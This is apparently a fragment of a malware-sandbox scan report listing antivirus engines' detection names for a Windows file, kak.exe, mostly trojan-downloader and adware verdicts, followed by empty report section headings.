Emsisoft	Application.DealAlpha.1.Gen (B)
SentinelOne	Static AI - Suspicious PE
Jiangmin	TrojanDownloader.Generic.bkpy
Webroot	W32.Malware.Gen
Avira	HEUR/AGEN.1142105
MAX	malware (ai score=87)
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Script/Phonzy.B!ml
Gridinsoft	Trojan.Win32.Downloader.vb
Arcabit	Application.DealAlpha.1.Gen
ZoneAlarm	HEUR:Trojan-Downloader.Win32.Chebka.gen
GData	Application.DealAlpha.1.Gen
AhnLab-V3	Malware/Win.Generic.R446742
McAfee	RDN/Generic Downloader.x
VBA32	TrojanDownloader.Chebka
Malwarebytes	Adware.Csdimonetize
Ikarus	Trojan-Downloader.Win32.Agent
Fortinet	Riskware/multiple_detections
AVG	FileRepMalware
Panda	Trj/CI.A
MaxSecure	Trojan.Malware.300983.susgen

kak.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All